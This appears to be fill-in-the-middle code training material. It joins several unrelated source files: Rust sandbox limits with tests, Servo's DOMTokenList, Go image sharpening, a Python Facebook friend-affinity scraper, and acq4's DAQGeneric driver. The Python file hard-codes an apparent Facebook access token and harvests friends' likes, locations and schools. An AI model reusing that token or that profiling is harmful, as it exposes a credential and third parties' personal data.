let mut limits = Self::default();
let res = conn.query(
"SELECT * FROM sandbox_overrides WHERE crate_name = $1;",
&[&name],
)?;
if !res.is_empty() {
let row = res.get(0);
if let Some(memory) = row.get::<_, Option<i64>>("max_memory_bytes") {
limits.memory = memory as usize;
}
if let Some(timeout) = row.get::<_, Option<i32>>("timeout_seconds") {
limits.timeout = Duration::from_secs(timeout as u64);
}
if let Some(targets) = row.get::<_, Option<i32>>("max_targets") {
limits.targets = targets as usize;
}
}
Ok(limits)
}
pub(crate) fn memory(&self) -> usize {
self.memory
}
pub(crate) fn timeout(&self) -> Duration {
self.timeout
}
pub(crate) fn networking(&self) -> bool {
self.networking
}
pub(crate) fn max_log_size(&self) -> usize {
self.max_log_size
}
pub(crate) fn targets(&self) -> usize {
self.targets
}
pub(crate) fn for_website(&self) -> BTreeMap<String, String> {<|fim▁hole|> res.insert("Available RAM".into(), SIZE_SCALE(self.memory));
res.insert(
"Maximum rustdoc execution time".into(),
TIME_SCALE(self.timeout.as_secs() as usize),
);
res.insert(
"Maximum size of a build log".into(),
SIZE_SCALE(self.max_log_size),
);
if self.networking {
res.insert("Network access".into(), "allowed".into());
} else {
res.insert("Network access".into(), "blocked".into());
}
res.insert(
"Maximum number of build targets".into(),
self.targets.to_string(),
);
res
}
}
const TIME_SCALE: fn(usize) -> String = |v| scale(v, 60, &["seconds", "minutes", "hours"]);
const SIZE_SCALE: fn(usize) -> String = |v| scale(v, 1024, &["bytes", "KB", "MB", "GB"]);
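/// Folds `value` into the largest unit where it is still at least 1,
/// e.g. TIME_SCALE(90) == "1.5 minutes" and SIZE_SCALE(10240) == "10 KB"
/// (both asserted in the tests below).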
fn scale(value: usize, interval: usize, labels: &[&str]) -> String {
let (mut value, interval) = (value as f64, interval as f64);
let mut chosen_label = &labels[0];
for label in &labels[1..] {
if value / interval >= 1.0 {
chosen_label = label;
value /= interval;
} else {
break;
}
}
// 2.x
let mut value = format!("{:.1}", value);
// 2.0 -> 2
if value.ends_with(".0") {
value.truncate(value.len() - 2);
}
format!("{} {}", value, chosen_label)
}
#[cfg(test)]
mod test {
use super::*;
use crate::test::*;
#[test]
fn retrieve_limits() {
wrapper(|env| {
let db = env.db();
let krate = "hexponent";
// limits work if no crate has limits set
let hexponent = Limits::for_crate(&db.conn(), krate)?;
assert_eq!(hexponent, Limits::default());
db.conn().query(
"INSERT INTO sandbox_overrides (crate_name, max_targets) VALUES ($1, 15)",
&[&krate],
)?;
// limits work if crate has limits set
let hexponent = Limits::for_crate(&db.conn(), krate)?;
assert_eq!(
hexponent,
Limits {
targets: 15,
..Limits::default()
}
);
// all limits work
let krate = "regex";
let limits = Limits {
memory: 100_000,
timeout: Duration::from_secs(300),
targets: 1,
..Limits::default()
};
db.conn().query(
"INSERT INTO sandbox_overrides (crate_name, max_memory_bytes, timeout_seconds, max_targets)
VALUES ($1, $2, $3, $4)",
&[&krate, &(limits.memory as i64), &(limits.timeout.as_secs() as i32), &(limits.targets as i32)]
)?;
assert_eq!(limits, Limits::for_crate(&db.conn(), krate)?);
Ok(())
});
}
#[test]
fn display_limits() {
let limits = Limits {
memory: 102_400,
timeout: Duration::from_secs(300),
targets: 1,
..Limits::default()
};
let display = limits.for_website();
assert_eq!(display.get("Network access"), Some(&"blocked".into()));
assert_eq!(
display.get("Maximum size of a build log"),
Some(&"100 KB".into())
);
assert_eq!(
display.get("Maximum number of build targets"),
Some(&limits.targets.to_string())
);
assert_eq!(
display.get("Maximum rustdoc execution time"),
Some(&"5 minutes".into())
);
assert_eq!(display.get("Available RAM"), Some(&"100 KB".into()));
}
#[test]
fn scale_limits() {
// time
assert_eq!(TIME_SCALE(300), "5 minutes");
assert_eq!(TIME_SCALE(1), "1 seconds");
assert_eq!(TIME_SCALE(7200), "2 hours");
// size
assert_eq!(SIZE_SCALE(1), "1 bytes");
assert_eq!(SIZE_SCALE(100), "100 bytes");
assert_eq!(SIZE_SCALE(1024), "1 KB");
assert_eq!(SIZE_SCALE(10240), "10 KB");
assert_eq!(SIZE_SCALE(1_048_576), "1 MB");
assert_eq!(SIZE_SCALE(10_485_760), "10 MB");
assert_eq!(SIZE_SCALE(1_073_741_824), "1 GB");
assert_eq!(SIZE_SCALE(10_737_418_240), "10 GB");
assert_eq!(SIZE_SCALE(std::u32::MAX as usize), "4 GB");
// fractional sizes
assert_eq!(TIME_SCALE(90), "1.5 minutes");
assert_eq!(TIME_SCALE(5400), "1.5 hours");
assert_eq!(SIZE_SCALE(1_288_490_189), "1.2 GB");
assert_eq!(SIZE_SCALE(3_758_096_384), "3.5 GB");
assert_eq!(SIZE_SCALE(1_048_051_712), "999.5 MB");
}
}<|fim▁end|>
|
let mut res = BTreeMap::new();
|
<|file_name|>domtokenlist.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::attr::Attr;
use dom::bindings::codegen::Bindings::DOMTokenListBinding;
use dom::bindings::codegen::Bindings::DOMTokenListBinding::DOMTokenListMethods;
use dom::bindings::error::{Error, ErrorResult, Fallible};
use dom::bindings::global::GlobalRef;
use dom::bindings::js::{JS, Root};
use dom::bindings::utils::{Reflector, reflect_dom_object};
use dom::element::Element;
use dom::node::window_from_node;
use std::borrow::ToOwned;
use string_cache::Atom;
use util::str::{DOMString, HTML_SPACE_CHARACTERS, str_join};
#[dom_struct]
pub struct DOMTokenList {
reflector_: Reflector,
element: JS<Element>,
local_name: Atom,
}
impl DOMTokenList {
pub fn new_inherited(element: &Element, local_name: Atom) -> DOMTokenList {
DOMTokenList {
reflector_: Reflector::new(),
element: JS::from_ref(element),
local_name: local_name,
}
}
pub fn new(element: &Element, local_name: &Atom) -> Root<DOMTokenList> {
let window = window_from_node(element);
reflect_dom_object(box DOMTokenList::new_inherited(element, local_name.clone()),
GlobalRef::Window(window.r()),
DOMTokenListBinding::Wrap)
}
fn attribute(&self) -> Option<Root<Attr>> {
let element = self.element.root();
element.r().get_attribute(&ns!(""), &self.local_name)
}
fn check_token_exceptions(&self, token: &str) -> Fallible<Atom> {
match token {
"" => Err(Error::Syntax),
slice if slice.find(HTML_SPACE_CHARACTERS).is_some() => Err(Error::InvalidCharacter),
slice => Ok(Atom::from_slice(slice))
}
}
}
// https://dom.spec.whatwg.org/#domtokenlist
impl DOMTokenListMethods for DOMTokenList {
// https://dom.spec.whatwg.org/#dom-domtokenlist-length
fn Length(&self) -> u32 {
self.attribute().map(|attr| {
let attr = attr.r();
attr.value().as_tokens().len()
}).unwrap_or(0) as u32
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-item
fn Item(&self, index: u32) -> Option<DOMString> {
self.attribute().and_then(|attr| {
let attr = attr.r();
Some(attr.value().as_tokens()).and_then(|tokens| {
tokens.get(index as usize).map(|token| (**token).to_owned())
})
})
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-contains
fn Contains(&self, token: DOMString) -> Fallible<bool> {
self.check_token_exceptions(&token).map(|token| {
self.attribute().map(|attr| {
let attr = attr.r();<|fim▁hole|> .as_tokens()
.iter()
.any(|atom: &Atom| *atom == token)
}).unwrap_or(false)
})
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-add
fn Add(&self, tokens: Vec<DOMString>) -> ErrorResult {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
for token in &tokens {
let token = try!(self.check_token_exceptions(&token));
if !atoms.iter().any(|atom| *atom == token) {
atoms.push(token);
}
}
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(())
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-remove
fn Remove(&self, tokens: Vec<DOMString>) -> ErrorResult {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
for token in &tokens {
let token = try!(self.check_token_exceptions(&token));
atoms.iter().position(|atom| *atom == token).map(|index| {
atoms.remove(index)
});
}
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(())
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-toggle
fn Toggle(&self, token: DOMString, force: Option<bool>) -> Fallible<bool> {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
let token = try!(self.check_token_exceptions(&token));
match atoms.iter().position(|atom| *atom == token) {
Some(index) => match force {
Some(true) => Ok(true),
_ => {
atoms.remove(index);
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(false)
}
},
None => match force {
Some(false) => Ok(false),
_ => {
atoms.push(token);
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(true)
}
}
}
}
// https://dom.spec.whatwg.org/#stringification-behavior
fn Stringifier(&self) -> DOMString {
let tokenlist = self.element.root().r().get_tokenlist_attribute(&self.local_name);
str_join(&tokenlist, "\x20")
}
// check-tidy: no specs after this line
fn IndexedGetter(&self, index: u32, found: &mut bool) -> Option<DOMString> {
let item = self.Item(index);
*found = item.is_some();
item
}
}<|fim▁end|>
|
attr.value()
|
<|file_name|>sharpen.go<|end_file_name|><|fim▁begin|>// Package sharpen provides functions to sharpen an image.
package sharpen
import (
"hawx.me/code/img/blur"
"hawx.me/code/img/utils"
"image"
"image/color"
"math"
)
// Sharpen takes an image and sharpens it by, essentially, unblurring it. It is
// currently extremely slow, so you are probably better off sticking to
// UnsharpMask.
func Sharpen(in image.Image, radius int, sigma float64) image.Image {
// Copied from ImageMagick, obvs.
//
// Sharpens the image. Convolve the image with a Gaussian operator of the
// given radius and standard deviation (sigma). For reasonable results radius
// should be larger than sigma.
//
// Using a seperable kernel would be faster, but the negative weights cancel
// out on the corners of the kernel producing often undesirable ringing in the
// filtered result; this can be avoided by using a 2D gaussian shaped image
// sharpening kernel instead.
//
	// (-exp(-(u*u + v*v) / (2.0 * sigma*sigma))) / (2.0 * Pi * sigma*sigma)
normalize := 0.0
f := func(u, v int) float64 {
usq := float64(u * u)
vsq := float64(v * v)
val := -math.Exp(-(usq+vsq)/(2.0*sigma*sigma)) / (2.0 * math.Pi * sigma * sigma)
normalize += val
return val
}
k := blur.NewKernel(radius*2+1, radius*2+1, f)
	k[radius][radius] = -2.0 * normalize // center of the (2*radius+1)x(2*radius+1) kernel
return blur.Convolve(in, k, blur.CLAMP)
}
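// Illustrative usage (a sketch, not from the original package docs): "img" is
// assumed to be an image.Image decoded elsewhere, and the argument values are
// arbitrary; radius 2 with sigma 1.0 keeps the radius larger than sigma, as
// recommended above.
//
//	out := sharpen.Sharpen(img, 2, 1.0)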
// UnsharpMask sharpens the given Image using the unsharp mask technique.
// Basically the image is blurred, then subtracted from the original for
// differences above the threshold value.
func UnsharpMask(in image.Image, radius int, sigma, amount, threshold float64) image.Image {
blurred := blur.Gaussian(in, radius, sigma, blur.IGNORE)
bounds := in.Bounds()
out := image.NewRGBA(bounds)
// Absolute difference between a and b, returns float64 between 0 and 1.
diff := func(a, b float64) float64 {
if a > b {
return a - b
}
return b - a
}
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
for x := bounds.Min.X; x < bounds.Max.X; x++ {
ar, ag, ab, aa := utils.RatioRGBA(in.At(x, y))
br, bg, bb, _ := utils.RatioRGBA(blurred.At(x, y))<|fim▁hole|>
if diff(ag, bg) >= threshold {
ag = amount*(ag-bg) + ag
}
if diff(ab, bb) >= threshold {
ab = amount*(ab-bb) + ab
}
out.Set(x, y, color.NRGBA{
uint8(utils.Truncatef(ar * 255)),
uint8(utils.Truncatef(ag * 255)),
uint8(utils.Truncatef(ab * 255)),
uint8(aa * 255),
})
}
}
return out
}<|fim▁end|>
|
if diff(ar, br) >= threshold {
ar = amount*(ar-br) + ar
}
|
<|file_name|>AfinidadeLikesEscolaELocalidades.py<|end_file_name|><|fim▁begin|># -*- coding: iso-8859-1 -*-
"""
Created on Wed Oct 22 21:49:24 2014
@author: fábioandrews
"""
import facebook
from DadosDeAmigoEmComum import DadosDeAmigoEmComum
class AfinidadeLikesEscolaELocalidades:
def __init__(self,ACCESS_TOKEN_FACEBOOK):
self.token_do_facebook = ACCESS_TOKEN_FACEBOOK
self.meusAmigos = []
self.amigosECoisasQueGostam = dict()
self.amigosELocalidades = dict()
self.pegarMeusAmigosECoisasQueElesGostam(ACCESS_TOKEN_FACEBOOK)
self.pegarAmigosELocalidades(ACCESS_TOKEN_FACEBOOK)
self.pegarAmigosEEscolas(ACCESS_TOKEN_FACEBOOK)
def pegarMeusAmigosECoisasQueElesGostam(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
        meusAmigosESeusIds = g.get_connections("me", "friends")['data'] # a hashmap with the friend's name as the key and their id as the value
likesDeMeusAmigosComCategoriasDataECoisasInuteis = { friend['name'] : g.get_connections(friend['id'], "likes")['data'] for friend in meusAmigosESeusIds }
        # the call above returns my friends associated with the things they like, but it is not just the name of what they like; it also carries date, category etc.
        chaves_de_likes = likesDeMeusAmigosComCategoriasDataECoisasInuteis.keys() # chaves_de_likes is an array with the names of my friends
        amigos_e_likes_simplificados = dict() # build a hashmap that simplifies my friends and their likes; I only need the friend's name associated with all of their likes
for nomeAmigo in chaves_de_likes:
likes_de_um_amigo = likesDeMeusAmigosComCategoriasDataECoisasInuteis[nomeAmigo]
for umLike in likes_de_um_amigo:
umLikeSimplificado = umLike['name']
                nomeAmigoEmUTf8 = nomeAmigo.encode(encoding='utf_8',errors='ignore') # it was returning u'somestring' without this; that is a different type from a normal string
umLikeSimplificadoEmUtf8 = umLikeSimplificado.encode(encoding='utf_8',errors='ignore')
if(nomeAmigoEmUTf8 not in amigos_e_likes_simplificados.keys()):
amigos_e_likes_simplificados[nomeAmigoEmUTf8] = [umLikeSimplificadoEmUtf8]
else:
amigos_e_likes_simplificados[nomeAmigoEmUTf8].append(umLikeSimplificadoEmUtf8);
self.amigosECoisasQueGostam = amigos_e_likes_simplificados
self.meusAmigos = self.amigosECoisasQueGostam.keys()
def pegarAmigosELocalidades(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
amigosELocalizacoesComplexo = g.get_connections("me", "friends", fields="location, name")
        amigos_e_localidades = dict() # a dictionary that maps a friend's name to their location
for fr in amigosELocalizacoesComplexo['data']:
if 'location' in fr:
                #print fr['name'] + ' ' + fr['location']["name"] # location is a dictionary with keys id and name, describing a place
                nomeAmigoUtf8 = fr['name'].encode(encoding='utf_8',errors='ignore')
                localidadeUtf8 = fr['location']["name"].encode(encoding='utf_8',errors='ignore')
                amigos_e_localidades[nomeAmigoUtf8] = localidadeUtf8
self.amigosELocalidades = amigos_e_localidades
    # at the end of this function I have a dict like: {'Felipe Dantas Moura': ['High School%Instituto Maria Auxiliadora', 'College%Spanish Courses Colegio Delibes', 'College%Federal University of Rio Grande do Norte'],...}
def pegarAmigosEEscolas(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
amigosEEscolasComplexo = g.get_connections("me","friends",fields="education, name")
        amigos_e_escolas = dict() # a dictionary that maps a friend's name to their schools; there can be two kinds, college or high school, so the value in this dict is an array like ["High School%Maria Auxilidadora","college%Federal University of Rio Grande do Norte"]
for fr in amigosEEscolasComplexo['data']:
if 'education' in fr:
nomeAmigoUtf8 = fr['name'].encode(encoding='utf_8',errors='ignore')
                arranjoEducation = fr['education'] # a person can have several high schools or colleges and can also have a graduate school
arranjoEducacaoMeuAmigo = []
for elementoArranjoEducation in arranjoEducation:
nomeEscola = elementoArranjoEducation['school']['name'].encode(encoding='utf_8',errors='ignore')
                    tipoEscola = elementoArranjoEducation['type'].encode(encoding='utf_8',errors='ignore') # can be high school, college or graduate school; college is the university
arranjoEducacaoMeuAmigo.append(tipoEscola + "%" + nomeEscola)
amigos_e_escolas[nomeAmigoUtf8] = arranjoEducacaoMeuAmigo
self.amigosEEscolas = amigos_e_escolas
    # given a friend, I will receive something like {giovanni: DadosDeAmigoEmComum}, where giovanni is a friend of meuAmigo
    # and DadosDeAmigoEmComum holds the associated score and an array with the likes giovanni has in common with meuAmigo
def acharCompatibilidadeEntreLikesDePaginas(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses = dict()
for outroAmigo in self.amigosECoisasQueGostam.keys():
if(outroAmigo != meuAmigo):
                # the friends are different; let's see if they have the same likes
likesEmComumEntreOsDois = []
for umLikeMeuAmigo in self.amigosECoisasQueGostam[meuAmigo]:
for umLikeOutroAmigo in self.amigosECoisasQueGostam[outroAmigo]:
if(umLikeMeuAmigo == umLikeOutroAmigo):
                            # we found a like in common between one friend and the other<|fim▁hole|>
# ha algo em comum entre os dois amigos e eles sao diferentes
pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[outroAmigo] = likesEmComumEntreOsDois
#ate agora eu tenho tipo {giovanni:['games','musica']} giovanni eh compativel com meuAmigo
#hora de calcular pontuacoes
quantasCoisasMeuAmigoGosta = len(self.amigosECoisasQueGostam[meuAmigo])
pessoasCompativeisComMeuAmigoSegundoLikes = dict() #o retorno da funcao
for amigoParecidoComMeuAmigo in pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses.keys():
quantasCoisasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo = len(pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[amigoParecidoComMeuAmigo])
nota = (10.0 * quantasCoisasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo) / quantasCoisasMeuAmigoGosta
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoLikes[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoLikes
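    # Worked example of the score above (numbers assumed): if meuAmigo likes 4
    # pages and shares 2 of them with giovanni, giovanni's score is
    # (10.0 * 2) / 4 = 5.0.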
def acharCompatibilidadeEntreLocalidade(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade = dict()
for outroAmigo in self.amigosELocalidades.keys():
if(outroAmigo != meuAmigo):
                # the friends are different; let's see if they have the same location
if(self.amigosELocalidades[outroAmigo] == self.amigosELocalidades[meuAmigo]):
                    # there is something in common between the two friends and they are different
pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade[outroAmigo] = self.amigosELocalidades[outroAmigo]
        # so far I have something like {giovanni: 'natal'}; giovanni is compatible with meuAmigo
        # time to compute scores
        pessoasCompativeisComMeuAmigoSegundoLocalidade = dict() # the function's return value
for amigoParecidoComMeuAmigo in pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade.keys():
nota = 10.0
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoLocalidade[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoLocalidade
def acharCompatibilidadeEntreEscolas(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas = dict()
for outroAmigo in self.amigosEEscolas.keys():
if(outroAmigo != meuAmigo):
                # the friends are different; let's see if they have the same schools
escolasEmComumEntreOsDois = []
for umaEscolaMeuAmigo in self.amigosEEscolas[meuAmigo]:
for umaEscolaOutroAmigo in self.amigosEEscolas[outroAmigo]:
if(umaEscolaMeuAmigo == umaEscolaOutroAmigo):
                            # we found a school in common between one friend and the other
escolasEmComumEntreOsDois.append(umaEscolaMeuAmigo)
if(len(escolasEmComumEntreOsDois) > 0):
                    # there is something in common between the two friends and they are different
pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[outroAmigo] = escolasEmComumEntreOsDois
        # so far I have something like {giovanni: ['High School%Instituto Maria Auxiliadora', 'College%UFRN - Universidade Federal do Rio Grande do Norte']}; giovanni is compatible with meuAmigo
        # time to compute scores
        quantasEscolasMeuAmigoCursou = len(self.amigosEEscolas[meuAmigo])
        pessoasCompativeisComMeuAmigoSegundoEscolas = dict() # the function's return value
for amigoParecidoComMeuAmigo in pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas.keys():
quantasEscolasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo = len(pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[amigoParecidoComMeuAmigo])
nota = (10.0 * quantasEscolasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo) / quantasEscolasMeuAmigoCursou
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoEscolas[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoEscolas
#the tests...
"""calculaAfinidades = AfinidadeLikesEscolaELocalidades('CAACEdEose0cBAG2OxI7v1nXVTzIX4JCoPSZByGR4OOr9leuRT2cjmNYo7nLg1sf9lRQstvd0HaIZCa1T9mK68GynHqqzhD5u6cCZATHZBrX99fHpWPBrM6NpTVKEXYNi5l45fk6ZAi87i8psDDAtOtjzA8hnymZAeN77LV3p2DtODu9l1na4gCz8hkgeHBHDjFC6TnVVFd8iivK0uhZAZBre')
amigosDePhillipEmComum = calculaAfinidades.acharCompatibilidadeEntreLikesDePaginas("Fábio Phillip Rocha Marques")
#still need to work out how to print this result for Phillip
print "!!!!!!!!!!!!!!!friends with the same likes as my friend Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComum.keys():
    print "######" , amigoEmComum
    amigosDePhillipEmComum[amigoEmComum].imprimirDadosDeAmigoEmComum();"""
"""amigosDePhillipEmComumLocalidades = calculaAfinidades.acharCompatibilidadeEntreLocalidade("Fábio Phillip Rocha Marques")
print "!!!!!!!!!!!!!!!friends with the same location as my friend Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComumLocalidades.keys():
    print "######" , amigoEmComum
    amigosDePhillipEmComumLocalidades[amigoEmComum].imprimirDadosDeAmigoEmComum();"""
"""print "!!!!!!!!!!!!!!!!! FÁBIO PHILLIP'S SCHOOLS !!!!!!!!!!!!!!!!!"
print calculaAfinidades.amigosEEscolas["Fábio Phillip Rocha Marques"]
amigosDePhillipEmComumEscolas = calculaAfinidades.acharCompatibilidadeEntreEscolas("Fábio Phillip Rocha Marques")
print "!!!!!!!!!!!!!!!friends with the same schools as my friend Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComumEscolas.keys():
    print "######" , amigoEmComum
    amigosDePhillipEmComumEscolas[amigoEmComum].imprimirDadosDeAmigoEmComum();"""<|fim▁end|>
|
likesEmComumEntreOsDois.append(umLikeMeuAmigo)
|
<|file_name|>DAQGeneric.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import print_function
from collections import OrderedDict
import numpy as np
import six
from acq4.devices.DAQGeneric.taskGUI import DAQGenericTaskGui
from acq4.devices.Device import Device, DeviceTask
from pyqtgraph import siFormat
from pyqtgraph.debug import Profiler
from acq4.util import Qt
from acq4.util.Mutex import Mutex
from acq4.util.debug import printExc
from pyqtgraph.metaarray import MetaArray, axis
Ui_Form = Qt.importTemplate('.DeviceTemplate')
class DataMapping:
"""Class that maps values between the voltages on a DAQ channel and the physically measured units.
By default, this class applies a simple linear scale and offset for analog channels. Digital channels
may optionally be inverted.
Vout = Value * scale - offset
Value = (Vin + offset) * scale
This class may be subclassed to allow any arbitrary mapping (eg, calibration curves, etc.)
"""
def __init__(self, device, chans=None):
"""When mapping initializes, it immediately grabs the scale and offset for each channel
specified in chans (or all channels if None). This means that the mapping is only valid
as long as these values have not changed."""
self.device = device
self.scale = {}
self.offset = {}
if chans is None:
chans = device.listChannels()
if isinstance(chans, six.string_types):<|fim▁hole|> self.scale[ch] = device.getChanScale(ch)
self.offset[ch] = device.getChanOffset(ch)
def mapToDaq(self, chan, data):
scale = self.scale[chan]
offset = self.offset[chan]
return (data * scale) - offset
def mapFromDaq(self, chan, data):
scale = self.scale[chan]
offset = self.offset[chan]
return (data + offset) * scale
class ChannelHandle(object):
def __init__(self, dev, channel):
self.dev = dev
self.channel = channel
class DAQGeneric(Device):
"""
Config format:
channels:
ChannelName1:
device: 'DaqDeviceName'
channel: '/Dev1/ao0'
type: 'ao'
units: 'A'
scale: 200 * mV / nA
ChannelName2:
device: 'DaqDeviceName'
channel: '/Dev1/ai3'
type: 'ai'
mode: 'nrse'
units: 'A'
scale: 200 * nA / mV
ChannelName3:
device: 'DaqDeviceName'
channel: '/Dev1/line7'
type: 'di'
invert: True
"""
sigHoldingChanged = Qt.Signal(object, object)
def __init__(self, dm, config, name):
Device.__init__(self, dm, config, name)
self._DGLock = Mutex(Qt.QMutex.Recursive) ## protects access to _DGHolding, _DGConfig
## Do some sanity checks here on the configuration
# 'channels' key is expected; for backward compatibility we just use the top-level config.
config = config.get('channels', config)
self._DGConfig = config
self._DGHolding = {}
for ch in config:
if config[ch]['type'][0] != 'a' and ('scale' in config[ch] or 'offset' in config[ch]):
raise Exception("Scale/offset only allowed for analog channels. (%s.%s)" % (name, ch))
if 'scale' not in config[ch]:
config[ch]['scale'] = 1 ## must be int to prevent accidental type conversion on digital data
if 'offset' not in config[ch]:
config[ch]['offset'] = 0
if config[ch].get('invert', False):
if config[ch]['type'][0] != 'd':
raise Exception("Inversion only allowed for digital channels. (%s.%s)" % (name, ch))
config[ch]['scale'] = -1
config[ch]['offset'] = -1
# print "chan %s scale %f" % (ch, config[ch]['scale'])
if 'holding' not in config[ch]:
config[ch]['holding'] = 0.0
## It is possible to create virtual channels with no real hardware connection
if 'device' not in config[ch]:
# print "Assuming channel %s is virtual:" % ch, config[ch]
config[ch]['virtual'] = True
## set holding value for all output channels now
if config[ch]['type'][1] == 'o':
self.setChanHolding(ch, config[ch]['holding'])
# self._DGHolding[ch] = config[ch]['holding']
dm.declareInterface(name, ['daqChannelGroup'], self)
for ch in config:
dm.declareInterface(name + "." + ch, ['daqChannel'], ChannelHandle(self, ch))
def mapToDAQ(self, channel, data):
mapping = self.getMapping(chans=[channel])
return mapping.mapToDaq(channel, data)
def mapFromDAQ(self, channel, data):
mapping = self.getMapping(chans=[channel])
return mapping.mapFromDaq(channel, data)
def getMapping(self, chans=None):
return DataMapping(self, chans)
def createTask(self, cmd, parentTask):
return DAQGenericTask(self, cmd, parentTask)
def getConfigParam(self, param):
return self._DGConfig.get(param, None)
def setChanHolding(self, channel, level=None, block=True, mapping=None):
"""Define and set the holding values for this channel
If *block* is True, then return only after the value has been set on the DAQ.
If *block* is False, then simply schedule the change to take place when the DAQ is available.
*mapping* is a DataMapping object which tells the device how to translate *level* into
a voltage on the physical DAQ channel. If *mapping* is None, then it will use self.getMapping(*channel*)
to determine the correct mapping.
"""
prof = Profiler(disabled=True)
with self._DGLock:
prof('lock')
# print "set holding", channel, level
### Set correct holding level here...
if level is None:
level = self._DGHolding[channel]
if level is None:
raise Exception("No remembered holding level for channel %s" % channel)
else:
self._DGHolding[channel] = level
if mapping is None:
mapping = self.getMapping(channel)
val = mapping.mapToDaq(channel, self._DGHolding[channel])
prof('map')
# print "Set holding for channel %s: %f => %f" % (channel, self._DGHolding[channel], val)
chConf = self._DGConfig[channel]
isVirtual = chConf.get('virtual', False)
if not isVirtual:
daq = chConf['device']
chan = chConf['channel']
daqDev = self.dm.getDevice(daq)
prof('get dev')
## release DGLock before setChannelValue
if not isVirtual:
if block:
daqDev.setChannelValue(chan, val, block=True)
else:
daqDev.setChannelValue(chan, val, block=False,
delaySetIfBusy=True) ## Note: If a task is running, this will not be set until it completes.
prof('set channel value')
self.sigHoldingChanged.emit(channel, level)
prof('emit')
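    # Illustrative call (channel name assumed): schedule a holding level of
    # 0.01 (in the channel's own units) on an output channel without waiting
    # for the DAQ to become available:
    #
    #   dev.setChanHolding('ChannelName1', 0.01, block=False)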
def getChanHolding(self, chan):
with self._DGLock:
return self._DGHolding[chan]
def getChannelValue(self, channel, block=True, raw=False):
with self._DGLock:
daq = self._DGConfig[channel]['device']
chan = self._DGConfig[channel]['channel']
mode = self._DGConfig[channel].get('mode', None)
## release _DGLock before getChannelValue
daqDev = self.dm.getDevice(daq)
val = daqDev.getChannelValue(chan, mode=mode, block=block)
if not raw:
return self.mapFromDAQ(channel, val)
else:
return val
def reconfigureChannel(self, chan, config):
"""Allows reconfiguration of channel properties (including the actual DAQ channel name)"""
with self._DGLock:
self._DGConfig[chan].update(config)
def deviceInterface(self, win):
"""Return a widget with a UI to put in the device rack"""
return DAQDevGui(self)
def taskInterface(self, taskRunner):
"""Return a widget with a UI to put in the task rack"""
return DAQGenericTaskGui(self, taskRunner)
def getDAQName(self, channel):
# return self._DGConfig[channel]['channel'][0]
with self._DGLock:
return self._DGConfig[channel]['device']
def quit(self):
pass
def setChanScale(self, ch, scale, update=True, block=True):
with self._DGLock:
self._DGConfig[ch]['scale'] = scale
if update and self.isOutput(ch): ## only set Holding for output channels
self.setChanHolding(ch, block=block)
def setChanOffset(self, ch, offset, update=True, block=True):
with self._DGLock:
self._DGConfig[ch]['offset'] = offset
if update and self.isOutput(ch): ## only set Holding for output channels
self.setChanHolding(ch, block=block)
